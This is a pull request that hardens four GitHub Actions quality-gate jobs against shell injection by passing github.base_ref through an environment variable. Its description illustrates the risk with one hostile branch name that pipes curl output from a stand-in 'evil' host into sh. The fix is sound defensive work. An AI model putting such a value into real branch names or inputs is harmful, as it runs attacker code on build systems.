### PR TITLE
fix(ci): pass quality-gate base ref via env var instead of shell interpolation

### DIFF
--- a/.github/workflows/quality-gates.yml
+++ b/.github/workflows/quality-gates.yml
@@ -15,7 +15,11 @@ jobs:
       - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
-      - run: chmod +x scripts/ci/no-stubs.sh && scripts/ci/no-stubs.sh origin/${{ github.base_ref }}
+      - env:
+          BASE_REF: ${{ github.base_ref }}
+        run: |
+          chmod +x scripts/ci/no-stubs.sh
+          scripts/ci/no-stubs.sh "origin/$BASE_REF"
 
   no-custom-crypto:
     name: No Unauthorized Crypto
@@ -24,7 +28,11 @@ jobs:
       - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
-      - run: chmod +x scripts/ci/no-custom-crypto.sh && scripts/ci/no-custom-crypto.sh origin/${{ github.base_ref }}
+      - env:
+          BASE_REF: ${{ github.base_ref }}
+        run: |
+          chmod +x scripts/ci/no-custom-crypto.sh
+          scripts/ci/no-custom-crypto.sh "origin/$BASE_REF"
 
   security-audit-required:
     name: Security Audit Required
@@ -33,7 +41,11 @@ jobs:
       - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
-      - run: chmod +x scripts/ci/security-audit-required.sh && scripts/ci/security-audit-required.sh origin/${{ github.base_ref }}
+      - env:
+          BASE_REF: ${{ github.base_ref }}
+        run: |
+          chmod +x scripts/ci/security-audit-required.sh
+          scripts/ci/security-audit-required.sh "origin/$BASE_REF"
 
   vendored-patch-audit:
     name: Dependency Audit Trail
@@ -42,4 +54,8 @@ jobs:
       - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
-      - run: chmod +x scripts/ci/vendored-patch-audit.sh && scripts/ci/vendored-patch-audit.sh origin/${{ github.base_ref }}
+      - env:
+          BASE_REF: ${{ github.base_ref }}
+        run: |
+          chmod +x scripts/ci/vendored-patch-audit.sh
+          scripts/ci/vendored-patch-audit.sh "origin/$BASE_REF"


### PR DESCRIPTION
## Summary

Four jobs in [`quality-gates.yml`](.github/workflows/quality-gates.yml) interpolated ``\${{ github.base_ref }}`` directly into a shell command line:

````yaml
- run: chmod +x scripts/ci/no-stubs.sh && scripts/ci/no-stubs.sh origin/\${{ github.base_ref }}
````

Same pattern in ``no-custom-crypto``, ``security-audit-required``, and ``vendored-patch-audit``.

## Risk

This is the canonical GitHub Actions [shell-injection vector](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable). The practical risk on this repo is low — ``github.base_ref`` is the upstream's base branch (typically ``main``), not the PR head, so attackers don't directly control its content via a fork PR — but the pattern is the anti-pattern. If a maintainer ever creates a branch named ``main;curl${IFS}evil|sh`` (the kind of thing that happens by accident or via copy-paste from an unrelated script), every quality-gate job becomes an arbitrary-code-execution site running with ``contents: read`` against repo source.

## Change

Move the context to an env var and reference ``\$BASE_REF`` from the shell, which is GHA's [documented hardening pattern](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable) for any expression that lands in ``run:``:

````yaml
- env:
    BASE_REF: \${{ github.base_ref }}
  run: |
    chmod +x scripts/ci/no-stubs.sh
    scripts/ci/no-stubs.sh \"origin/\$BASE_REF\"
````

Same change applied to all four jobs. Quoting ``\"origin/\$BASE_REF\"`` further blocks word-splitting on whitespace; the ``$()``-style command substitution that an interpolated expression would have enabled is no longer available, since shell expansion of ``\$BASE_REF`` is the only thing that fires.

Also split the chained ``chmod && scripts/...`` into separate lines — the original one-liner is harder to scan visually for what the actual command does.

## Tests

Workflow YAML; no local test harness. The behaviour is unchanged for any valid base ref (which is essentially all of them in practice — ``main`` and other valid branch names contain no shell metacharacters).

## Test plan

- [ ] CI passes
- [ ] Quality-gate jobs continue to compare against ``origin/main`` on a PR targeting ``main``

---

Surfaced during independent audit conducted by @finnoybu (Ken Tannenbaum, AEGIS Initiative); [MEDIUM, Infrastructure/CI].